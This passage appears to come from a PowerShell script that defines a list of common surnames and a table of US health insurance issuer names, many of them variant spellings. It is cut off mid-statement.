"ADAMS","ALLEN","ANDERSON","BAILEY","BAKER","BARNES","BELL","BENNETT","BROOKS","BROWN","BUTLER","CAMPBELL","CARTER","CLARK","COLLINS","COOK","COOPER","COX","CRUZ","DAVIS","DIAZ","EDWARDS","EVANS","FISHER","FLORES","FOSTER","GARCIA","GOMEZ","GONZALEZ","GRAY","GREEN","GUTIERREZ","HALL","HARRIS","HERNANDEZ","HILL","HOWARD","HUGHES","JACKSON","JAMES","JENKINS","JOHNSON","JONES","KELLY","KING","LEE","LEWIS","LONG","LOPEZ","MARTIN","MARTINEZ","MILLER","MITCHELL","MOORE","MORALES","MORGAN","MORRIS","MURPHY","MYERS","NELSON","NGUYEN","ORTIZ","PARKER","PEREZ","PERRY","PETERSON","PHILLIPS","POWELL","PRICE","RAMIREZ","REED","REYES","RICHARDSON","RIVERA","ROBERTS","ROBINSON","RODRIGUEZ","ROGERS","ROSS","RUSSELL","SANCHEZ","SANDERS","SCOTT","SMITH","STEWART","SULLIVAN","TAYLOR","THOMAS","THOMPSON","TORRES","TURNER","WALKER","WARD","WATSON","WHITE","WILLIAMS","WILSON","WOOD","WRIGHT","YOUNG" + + # Define health insurance companies + $InsuranceCompanies = New-Object System.Data.DataTable + $null = $InsuranceCompanies.Columns.Add("issuer_name") + $null = $InsuranceCompanies.Rows.Add("Aetna Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Premera Blue Shield Blue Cross") + $null = $InsuranceCompanies.Rows.Add("Premera Blue Cross Blue Shield of Alaska") + $null = $InsuranceCompanies.Rows.Add("Premera Blue Shield Blue Cross of Alaska") + $null = $InsuranceCompanies.Rows.Add("Time Insurance Company") + $null = $InsuranceCompanies.Rows.Add("John Alden Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Moda Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Moda Health Plan, Inc") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Celtic Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Standard Security Life Insurance Company of New York") + $null = $InsuranceCompanies.Rows.Add("All Savers Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Humana Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Federated Mutual Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Blue Cross and Blue Shield of Alabama") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Alabama, Inc.") + $null = $InsuranceCompanies.Rows.Add("United Healthcare of Alabama, Inc.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Alabama") + $null = $InsuranceCompanies.Rows.Add("United Healthcare of Alabama") + $null = $InsuranceCompanies.Rows.Add("GOLDEN RULE INSURANCE COMPANY") + $null = $InsuranceCompanies.Rows.Add("VIVA Health, Inc.") + $null = $InsuranceCompanies.Rows.Add("Freedom Life Insurance Company of America") + $null = $InsuranceCompanies.Rows.Add("HMO Partners, Inc. d/b/a Health Advantage") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare Insurance Company of the River Valley") + $null = $InsuranceCompanies.Rows.Add("United Healthcare Insurance Company of the River Valley") + $null = $InsuranceCompanies.Rows.Add("QualChoice Life and Health Insurance Company, Inc.") + $null = $InsuranceCompanies.Rows.Add("QualChoice Life & Health Insurance Company, Inc.") + $null = $InsuranceCompanies.Rows.Add("Coventry Health and Life") + $null = $InsuranceCompanies.Rows.Add("Coventry Health & Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Arkansas, Inc.") + $null = $InsuranceCompanies.Rows.Add("QCA Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("QCA Health Plan Inc.") + $null = $InsuranceCompanies.Rows.Add("USAble Mutual Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Arkansas Blue Cross and Blue Shield, Inc.") + $null = $InsuranceCompanies.Rows.Add("Madison National Life Insurance Company, Inc.") + $null = $InsuranceCompanies.Rows.Add("Humana Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Humana Health Plan") + $null = $InsuranceCompanies.Rows.Add("National Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Arizona, Inc.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Arizona") + $null = $InsuranceCompanies.Rows.Add("National Foundation Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Health Net Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Health Net Life Insurance Co.") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield of Arizona, Inc.") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield of Arizona") + $null = $InsuranceCompanies.Rows.Add("BlueCross BlueShield of Arizona") + $null = $InsuranceCompanies.Rows.Add("Compass Cooperative Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Compass Cooperative Health Plan, Inc. dba Meritus Health Partners") + $null = $InsuranceCompanies.Rows.Add("Abrazo Advantage Health Plan") + $null = $InsuranceCompanies.Rows.Add("Phoenix Health Plans, Inc.") + $null = $InsuranceCompanies.Rows.Add("Health Choice Insurance Co") + $null = $InsuranceCompanies.Rows.Add("Enterprise Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("WMI Mutual Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Golden Rule Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Aetna Health Inc.") + $null = $InsuranceCompanies.Rows.Add("Aetna Health Inc. (a PA corp.)") + $null = $InsuranceCompanies.Rows.Add("Sterling Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Cigna Health and Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("University Healthcare, Inc.") + $null = $InsuranceCompanies.Rows.Add("Health Net of Arizona") + $null = $InsuranceCompanies.Rows.Add("Compass Cooperative Mutual Health Network, Inc.") + $null = $InsuranceCompanies.Rows.Add("Compass Cooperative Mutual Health Network, Inc. dba Meritus Mutual Health Partners") + $null = $InsuranceCompanies.Rows.Add("Cigna HealthCare of Arizona, Inc.") + $null = $InsuranceCompanies.Rows.Add("Oscar Health Plan of California") + $null = $InsuranceCompanies.Rows.Add("SeeChange") + $null = $InsuranceCompanies.Rows.Add("SeeChange Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of California") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of California, Inc.") + $null = $InsuranceCompanies.Rows.Add("Medi-Excel") + $null = $InsuranceCompanies.Rows.Add("Medi-Excel, SA de CV") + $null = $InsuranceCompanies.Rows.Add("Aetna Health of California Inc.") + $null = $InsuranceCompanies.Rows.Add("Aetna Health of California, Inc.") + $null = $InsuranceCompanies.Rows.Add("Kaiser Permanente Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Anthem Blue Cross (DMHC)") + $null = $InsuranceCompanies.Rows.Add("Anthem Blue Cross (licensed by DMHC)") + $null = $InsuranceCompanies.Rows.Add("Blue Cross of California(Anthem BC)") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare Benefits Plan of California") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundation Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundation Health Plan Inc.") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundation Health Plas, Inc.") + $null = $InsuranceCompanies.Rows.Add("Chinese Community Health Plan") + $null = $InsuranceCompanies.Rows.Add("Anthem Blue Cross Life and Health Insurance Company (CDI)") + $null = $InsuranceCompanies.Rows.Add("UHC of California") + $null = $InsuranceCompanies.Rows.Add("Sutter Health Plan") + $null = $InsuranceCompanies.Rows.Add("Sutter Health Plus") + $null = $InsuranceCompanies.Rows.Add("National Health Insurance Co.") + $null = $InsuranceCompanies.Rows.Add("Health Net, Inc.") + $null = $InsuranceCompanies.Rows.Add("Health Net of California") + $null = $InsuranceCompanies.Rows.Add("Health Net of California Inc.") + $null = $InsuranceCompanies.Rows.Add("California Physicians' Services dba Blue Shield of California") + $null = $InsuranceCompanies.Rows.Add("California Physician's Service, dba Blue Shield of California") + $null = $InsuranceCompanies.Rows.Add("California Physicians? Service dba Blue Shield of California") + $null = $InsuranceCompanies.Rows.Add("California Physician's Servce, dba Blue Shield of California") + $null = $InsuranceCompanies.Rows.Add("County of Santa Clara dba Valley Health Plan") + $null = $InsuranceCompanies.Rows.Add("Sharp Health Plan") + $null = $InsuranceCompanies.Rows.Add("Local Initiative Health Authority for Los Angeles County, dba L.A. Care Health Plan") + $null = $InsuranceCompanies.Rows.Add("Local Initiative Health Authority Los Angeles County") + $null = $InsuranceCompanies.Rows.Add("Western Health Advantage") + $null = $InsuranceCompanies.Rows.Add("Connecticut General Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("UHIC") + $null = $InsuranceCompanies.Rows.Add("Health Net Life Insurance") + $null = $InsuranceCompanies.Rows.Add("Contra Costa Health Plan") + $null = $InsuranceCompanies.Rows.Add("New Health Ventures, Inc.") + $null = $InsuranceCompanies.Rows.Add("Colorado Health Insurance Cooperative, Inc.") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundation Health Plan of Colorado") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundation Helath Plan of Colorado") + $null = $InsuranceCompanies.Rows.Add("Bright Health Plan") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Colorado, INC.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Colorado") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Colorado Inc.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Colorado, Inc.") + $null = $InsuranceCompanies.Rows.Add("Colorado Choice Health Plans") + $null = $InsuranceCompanies.Rows.Add("Denver Health Medical Plan") + $null = $InsuranceCompanies.Rows.Add("Denver Health Medical Plan Inc.") + $null = $InsuranceCompanies.Rows.Add("Denver Health") + $null = $InsuranceCompanies.Rows.Add("Unitedhealthcare Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Humana Health Plan Inc.") + $null = $InsuranceCompanies.Rows.Add("HMO Colorado, Inc.?") + $null = $InsuranceCompanies.Rows.Add("HMO Colorado, Inc.") + $null = $InsuranceCompanies.Rows.Add("HMO Colorado Inc(Anthem BCBS)") + $null = $InsuranceCompanies.Rows.Add("Rocky Mountain Healthcare Options") + $null = $InsuranceCompanies.Rows.Add("Rocky Mountain HCO") + $null = $InsuranceCompanies.Rows.Add("Rocky Mountain Hospital And Medical Service, Inc., D.B.A. Anthem Blue Cross And Blue Shield?") + $null = $InsuranceCompanies.Rows.Add("Rocky Mountain Hospital And Medical Service, Inc., D.B.A. Anthem Blue Cross And Blue Shield") + $null = $InsuranceCompanies.Rows.Add("Rocky Mountain Hos&Med Svc(Anthem BCBS)") + $null = $InsuranceCompanies.Rows.Add("Rocky Mountain HMO") + $null = $InsuranceCompanies.Rows.Add("Oxford Health Insurance, Inc") + $null = $InsuranceCompanies.Rows.Add("Oxford Health Insurance, Inc.") + $null = $InsuranceCompanies.Rows.Add("Oxford Health Plans (CT), Inc.") + $null = $InsuranceCompanies.Rows.Add("CCI") + $null = $InsuranceCompanies.Rows.Add("ConnectiCare Inc.") + $null = $InsuranceCompanies.Rows.Add("Connecticare Benefit Inc.") + $null = $InsuranceCompanies.Rows.Add("ConnectiCare Benefits Inc.") + $null = $InsuranceCompanies.Rows.Add("ConnectiCare Benefit Inc.") + $null = $InsuranceCompanies.Rows.Add("Anthem Health Plans, Inc.") + $null = $InsuranceCompanies.Rows.Add("Anthem Health Plans Inc.") + $null = $InsuranceCompanies.Rows.Add("Harvard Pilgrim Health Care of Connecticut, Inc.") + $null = $InsuranceCompanies.Rows.Add("HealthyCT, Inc.") + $null = $InsuranceCompanies.Rows.Add("HealthyCT") + $null = $InsuranceCompanies.Rows.Add("HealthyCT Inc.") + $null = $InsuranceCompanies.Rows.Add("Connecticare Insurance Company, Inc.") + $null = $InsuranceCompanies.Rows.Add("CICI") + $null = $InsuranceCompanies.Rows.Add("ConnectiCare Insurance Company Inc.") + $null = $InsuranceCompanies.Rows.Add("CIGNA HealthCare of Connecticut") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of the Mid-Atlantic, Inc.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of the Mid-Atlantic Navigate") + $null = $InsuranceCompanies.Rows.Add("United Healthcare Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Optimum Choice, Inc.") + $null = $InsuranceCompanies.Rows.Add("Optum Choice Inc") + $null = $InsuranceCompanies.Rows.Add("Group Hospitalization & Medical Services, Inc") + $null = $InsuranceCompanies.Rows.Add("Group Hospitalization & Medical Services, Inc.") + $null = $InsuranceCompanies.Rows.Add("GHMSI, Inc.") + $null = $InsuranceCompanies.Rows.Add("BlueChoice, Inc.") + $null = $InsuranceCompanies.Rows.Add("CareFirst BlueChoice Inc.") + $null = $InsuranceCompanies.Rows.Add("CareFirst BlueChoice, Inc.") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundation Health Plan of the Mid-Atlantic States, Inc.") + $null = $InsuranceCompanies.Rows.Add("Coventry Health and Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Aetna Life Incurance Company") + $null = $InsuranceCompanies.Rows.Add("Aetna Health") + $null = $InsuranceCompanies.Rows.Add("Highmark BCBSD, Inc") + $null = $InsuranceCompanies.Rows.Add("Highmark BCBSD Inc.") + $null = $InsuranceCompanies.Rows.Add("Highmark BCBSD, Inc.") + $null = $InsuranceCompanies.Rows.Add("Highmark DE") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of Delaware") + $null = $InsuranceCompanies.Rows.Add("CHC of DE") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield of Florida") + $null = $InsuranceCompanies.Rows.Add("Aetna Health Inc. (a FL corp.)") + $null = $InsuranceCompanies.Rows.Add("Aetna Health Inc. (a FL corp.)") + $null = $InsuranceCompanies.Rows.Add("AvMed, Inc.") + $null = $InsuranceCompanies.Rows.Add("Health First Health Plans, Inc.") + $null = $InsuranceCompanies.Rows.Add("Health Options, Inc.") + $null = $InsuranceCompanies.Rows.Add("Health Options, Inc") + $null = $InsuranceCompanies.Rows.Add("Humana Medical Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Health First Commercial Plans, Inc.") + $null = $InsuranceCompanies.Rows.Add("Allsavers Insurance Company") + $null = $InsuranceCompanies.Rows.Add("United Healthcare Insurance Co.") + $null = $InsuranceCompanies.Rows.Add("United Healthcare Insurance Company Inc.") + $null = $InsuranceCompanies.Rows.Add("Simply Healthcare Plans, Inc.") + $null = $InsuranceCompanies.Rows.Add("Preferred Medical Plan,Inc") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of Florida, Inc") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of Florida, Inc.") + $null = $InsuranceCompanies.Rows.Add("FLORIDA HEALTH CARE PLAN, INC.") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of Florida, Inc.") + $null = $InsuranceCompanies.Rows.Add("Capital Health Plan") + $null = $InsuranceCompanies.Rows.Add("Capital Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("United Healthcare of Florida") + $null = $InsuranceCompanies.Rows.Add("United Healthcare of Florida Inc.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Florida, Inc.") + $null = $InsuranceCompanies.Rows.Add("Unitedhealthcare of Florida, Inc.") + $null = $InsuranceCompanies.Rows.Add("Health First Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Health First Insurance, Inc.") + $null = $InsuranceCompanies.Rows.Add("Neightborhood Health Partnership") + $null = $InsuranceCompanies.Rows.Add("Neighborhood Health Partnership Inc.") + $null = $InsuranceCompanies.Rows.Add("Neighborhood Health Partnership, Inc.") + $null = $InsuranceCompanies.Rows.Add("Florida Health Solution HMO Company") + $null = $InsuranceCompanies.Rows.Add("Sunshine State Health Plan") + $null = $InsuranceCompanies.Rows.Add("Harken Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Plan of Florida, Inc.") + $null = $InsuranceCompanies.Rows.Add("Humana Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Humana Health Insurance Company of FL, Inc.") + $null = $InsuranceCompanies.Rows.Add("Nippon Life Insurance Company of America") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of the River Valley") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Georgia, Inc.") + $null = $InsuranceCompanies.Rows.Add("Peach State Health Plan") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of Georgia, Inc.") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield Healthcare Plan of Georgia, Inc.") + $null = $InsuranceCompanies.Rows.Add("Cigna Health & Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield of GA, Inc") + $null = $InsuranceCompanies.Rows.Add("Ambetter of Peach State, Inc.") + $null = $InsuranceCompanies.Rows.Add("Ambetter of Peach State Inc.") + $null = $InsuranceCompanies.Rows.Add("Aetna Health Inc. (a GA corp.)") + $null = $InsuranceCompanies.Rows.Add("Aetna Health Inc. (a GA corp.)") + $null = $InsuranceCompanies.Rows.Add("Athens Area Health Plan Select, Inc.") + $null = $InsuranceCompanies.Rows.Add("Alliant Health Plans") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundation Health Plan of Georgia") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundation Health Plan") + $null = $InsuranceCompanies.Rows.Add("Humana Employers Health Plan of GA, Inc.") + $null = $InsuranceCompanies.Rows.Add("Humana Employers Health Plan of Georgia, Inc.") + $null = $InsuranceCompanies.Rows.Add("Family Health Hawaii") + $null = $InsuranceCompanies.Rows.Add("HMSA") + $null = $InsuranceCompanies.Rows.Add("Hawaii Medical Assurance Association") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundation Health Plan, Inc. - HI") + $null = $InsuranceCompanies.Rows.Add("University Health Alliance") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of Iowa Inc.") + $null = $InsuranceCompanies.Rows.Add("CHC IA") + $null = $InsuranceCompanies.Rows.Add("Aetna Health of Iowa Inc.") + $null = $InsuranceCompanies.Rows.Add("Wellmark Health Plan of Iowa, Inc.") + $null = $InsuranceCompanies.Rows.Add("Wellmark Health Plan of Iowa") + $null = $InsuranceCompanies.Rows.Add("Gundersen Health Plan") + $null = $InsuranceCompanies.Rows.Add("Gundersen Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Medical Associates Health Plans") + $null = $InsuranceCompanies.Rows.Add("Medical Associates Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Medical Associates Health Plan Inc") + $null = $InsuranceCompanies.Rows.Add("Pekin Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("CHL IA") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of the Midlands, Inc.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare Plan of the River Valley, Inc.") + $null = $InsuranceCompanies.Rows.Add("CoOportunity Health") + $null = $InsuranceCompanies.Rows.Add("Wellmark Blue Cross Blue Shield of Iowa") + $null = $InsuranceCompanies.Rows.Add("Wellmark Inc") + $null = $InsuranceCompanies.Rows.Add("Wellmark, Inc.") + $null = $InsuranceCompanies.Rows.Add("Wellmark Inc.") + $null = $InsuranceCompanies.Rows.Add("Wellmark Value Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Avera Health Plans, Inc.") + $null = $InsuranceCompanies.Rows.Add("Health Alliance Medical Plan") + $null = $InsuranceCompanies.Rows.Add("Health Alliance Midwest") + $null = $InsuranceCompanies.Rows.Add("Sanford Health Plan") + $null = $InsuranceCompanies.Rows.Add("Wellmark Synergy Health, Inc.") + $null = $InsuranceCompanies.Rows.Add("Medica Insurance Company") + $null = $InsuranceCompanies.Rows.Add("SelectHealth") + $null = $InsuranceCompanies.Rows.Add("Mountain Health CO-OP") + $null = $InsuranceCompanies.Rows.Add("Regence BlueShield of Idaho") + $null = $InsuranceCompanies.Rows.Add("BridgeSpan Health Company") + $null = $InsuranceCompanies.Rows.Add("BridgeSpan Health Idaho") + $null = $InsuranceCompanies.Rows.Add("PacificSource Health Plans, Inc.") + $null = $InsuranceCompanies.Rows.Add("PacificSource Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("PacificSource Health Plans") + $null = $InsuranceCompanies.Rows.Add("Altius Health Plans Inc.") + $null = $InsuranceCompanies.Rows.Add("Aetna Health of Utah Inc.") + $null = $InsuranceCompanies.Rows.Add("Blue Cross of Idaho Health Service, Inc.") + $null = $InsuranceCompanies.Rows.Add("Family Health Network, Inc.") + $null = $InsuranceCompanies.Rows.Add("UNITEDHEALTHCARE INSURANCE COMPANY") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of the Midwest, Inc.") + $null = $InsuranceCompanies.Rows.Add("Health Alliance Medical Plans") + $null = $InsuranceCompanies.Rows.Add("CHL IL") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield of Illinois") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Illinois, Inc.") + $null = $InsuranceCompanies.Rows.Add("UNITEDHEALTHCARE OF ILLINOIS INC.") + $null = $InsuranceCompanies.Rows.Add("Cigna HealthCare of Illinois, Inc.") + $null = $InsuranceCompanies.Rows.Add("IlliniCare Health Plan") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of Missouri, Inc.") + $null = $InsuranceCompanies.Rows.Add("CHC-MO") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of Missouri") + $null = $InsuranceCompanies.Rows.Add("Coventry Healthcare of Missouri") + $null = $InsuranceCompanies.Rows.Add("US Health and Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Midwest Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Land of Lincoln Mutual Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare Insurance Company of Illinois") + $null = $InsuranceCompanies.Rows.Add("UNITEDHEALTHCARE INSURANCE COMPANY OF ILLINOIS") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of Illinois, Inc.") + $null = $InsuranceCompanies.Rows.Add("CHC-IL") + $null = $InsuranceCompanies.Rows.Add("IL IL") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of Illinois") + $null = $InsuranceCompanies.Rows.Add("Aetna Health, Inc.") + $null = $InsuranceCompanies.Rows.Add("Anthem Insurance Companies, Inc.") + $null = $InsuranceCompanies.Rows.Add("Advantage Health Solutions Inc.") + $null = $InsuranceCompanies.Rows.Add("Indiana University Health Plans, Inc.") + $null = $InsuranceCompanies.Rows.Add("Coordinated Care Corporation") + $null = $InsuranceCompanies.Rows.Add("ALL SAVERS INSURANCE COMPANY") + $null = $InsuranceCompanies.Rows.Add("All Savers") + $null = $InsuranceCompanies.Rows.Add("United Healthcare Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Medical Mutual of Ohio") + $null = $InsuranceCompanies.Rows.Add("Medical Benefits Mutual Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Physicians Health Plan of Northern IN") + $null = $InsuranceCompanies.Rows.Add("Physicians Health Plan of Northern Indiana, Inc.") + $null = $InsuranceCompanies.Rows.Add("CareSource Indiana Inc.") + $null = $InsuranceCompanies.Rows.Add("CareSource Indiana Co") + $null = $InsuranceCompanies.Rows.Add("CareSource Indiana, Inc.") + $null = $InsuranceCompanies.Rows.Add("MDwise Marketplace, Inc.") + $null = $InsuranceCompanies.Rows.Add("Mdwise Marketplace, Inc") + $null = $InsuranceCompanies.Rows.Add("Southeastern Indiana Health Organization, Inc.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealth Care Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Mdwise, Inc.") + $null = $InsuranceCompanies.Rows.Add("Blue Cross and Blue Shield of Kansas, Inc.") + $null = $InsuranceCompanies.Rows.Add("BlueCross BlueShield Kansas Solutions, Inc.") + $null = $InsuranceCompanies.Rows.Add("BlueCross BlueShield Kansas Solutions. Inc.") + $null = $InsuranceCompanies.Rows.Add("Humana Health Plan, Inc") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of the Midwest") + $null = $InsuranceCompanies.Rows.Add("CHL KS") + $null = $InsuranceCompanies.Rows.Add("CHL") + $null = $InsuranceCompanies.Rows.Add("CHC KS") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care Of Kansas Inc") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of Kansas") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of Kansas, Inc.") + $null = $InsuranceCompanies.Rows.Add("ALIC") + $null = $InsuranceCompanies.Rows.Add("Blue Cross and Blue Shield of Kansas City") + $null = $InsuranceCompanies.Rows.Add("Humana Insurance Company of KY") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Kentucky, Ltd.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Kentucky Ltd.") + $null = $InsuranceCompanies.Rows.Add("UNITEDHEALTHCARE OF KENTUCKY LTD.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Kentucky LTD.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Kentucky") + $null = $InsuranceCompanies.Rows.Add("Anthem Health Plans of Kentucky, Inc.") + $null = $InsuranceCompanies.Rows.Add("Anthem Health Plans of KY(Anthem BCBS)") + $null = $InsuranceCompanies.Rows.Add("Bluegrass Family Health") + $null = $InsuranceCompanies.Rows.Add("Baptist Health Plan Inc.") + $null = $InsuranceCompanies.Rows.Add("Bluegrass Family Health, Inc.") + $null = $InsuranceCompanies.Rows.Add("Baptist Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Baptist Health Plan") + $null = $InsuranceCompanies.Rows.Add("CareSource Kentucky Co.") + $null = $InsuranceCompanies.Rows.Add("CareSource Kentucky Co") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Ohio, Inc.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Ohio Inc.") + $null = $InsuranceCompanies.Rows.Add("UNITEDHEALTHCARE OF OHIO INC.") + $null = $InsuranceCompanies.Rows.Add("WellCare Health Plans of Kentucky, Inc.") + $null = $InsuranceCompanies.Rows.Add("WellCare Health Plans of Kentucky Inc") + $null = $InsuranceCompanies.Rows.Add("Kentucky Health Cooperative, Inc.") + $null = $InsuranceCompanies.Rows.Add("HMO Louisiana, Inc.") + $null = $InsuranceCompanies.Rows.Add("United Healthcare of Louisiana, Inc.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Louisiana, Inc.") + $null = $InsuranceCompanies.Rows.Add("Humana Health Benefit Plan of Louisiana, Inc.") + $null = $InsuranceCompanies.Rows.Add("Humana Health Benefit Plan of LA, Inc.") + $null = $InsuranceCompanies.Rows.Add("Humana Benefit Plan of Louisiana, Inc.") + $null = $InsuranceCompanies.Rows.Add("Louisiana Health Cooperative, Inc.") + $null = $InsuranceCompanies.Rows.Add("Vantage Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of Lousiana, Inc.") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of Louisiana, Inc.") + $null = $InsuranceCompanies.Rows.Add("Aetna Health Inc. of Louisiana") + $null = $InsuranceCompanies.Rows.Add("Aetna Health Inc. (a LA corp.)") + $null = $InsuranceCompanies.Rows.Add("Louisiana Health Service & Indemnity Company") + $null = $InsuranceCompanies.Rows.Add("Blue Cross and Blue Shield of Massachusetts, Inc.") + $null = $InsuranceCompanies.Rows.Add("Tufts Associated Health Maintenance Organization, Inc.") + $null = $InsuranceCompanies.Rows.Add("Tufts Associated Health Maintenance Organization") + $null = $InsuranceCompanies.Rows.Add("CeltiCare Health Plan of MA") + $null = $InsuranceCompanies.Rows.Add("CeltiCare Health Plan of Massachusetts") + $null = $InsuranceCompanies.Rows.Add("Health New England") + $null = $InsuranceCompanies.Rows.Add("Health New England Inc.") + $null = $InsuranceCompanies.Rows.Add("Harvard Pilgrim Health Care") + $null = $InsuranceCompanies.Rows.Add("Tufts Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Neighborhood Health Plan") + $null = $InsuranceCompanies.Rows.Add("Neighborhood Health Plan Inc.") + $null = $InsuranceCompanies.Rows.Add("Blue Cross and Blue Shield of Massachusetts HMO Blue, Inc") + $null = $InsuranceCompanies.Rows.Add("Fallon Health & Life Assurance Co") + $null = $InsuranceCompanies.Rows.Add("Fallon Health & Life Assurance Company") + $null = $InsuranceCompanies.Rows.Add("Tufts Health Public Plans") + $null = $InsuranceCompanies.Rows.Add("Tufts Health Public Plans Inc.") + $null = $InsuranceCompanies.Rows.Add("Minuteman Health, Inc.") + $null = $InsuranceCompanies.Rows.Add("BMCHP") + $null = $InsuranceCompanies.Rows.Add("Boston Medical Center Health Plan") + $null = $InsuranceCompanies.Rows.Add("Fallon Health") + $null = $InsuranceCompanies.Rows.Add("Fallon Community Health Plan") + $null = $InsuranceCompanies.Rows.Add("Fallon Community Health Plan Inc.") + $null = $InsuranceCompanies.Rows.Add("Fallon Community Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("ConnectiCare of Massachusetts, Inc.") + $null = $InsuranceCompanies.Rows.Add("CMI") + $null = $InsuranceCompanies.Rows.Add("Harvard Pilgrim Insurance Company") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of the Mid-Atlantic Inc.") + $null = $InsuranceCompanies.Rows.Add("All Savers Insurance Co.") + $null = $InsuranceCompanies.Rows.Add("CareFirst of Maryland, Inc") + $null = 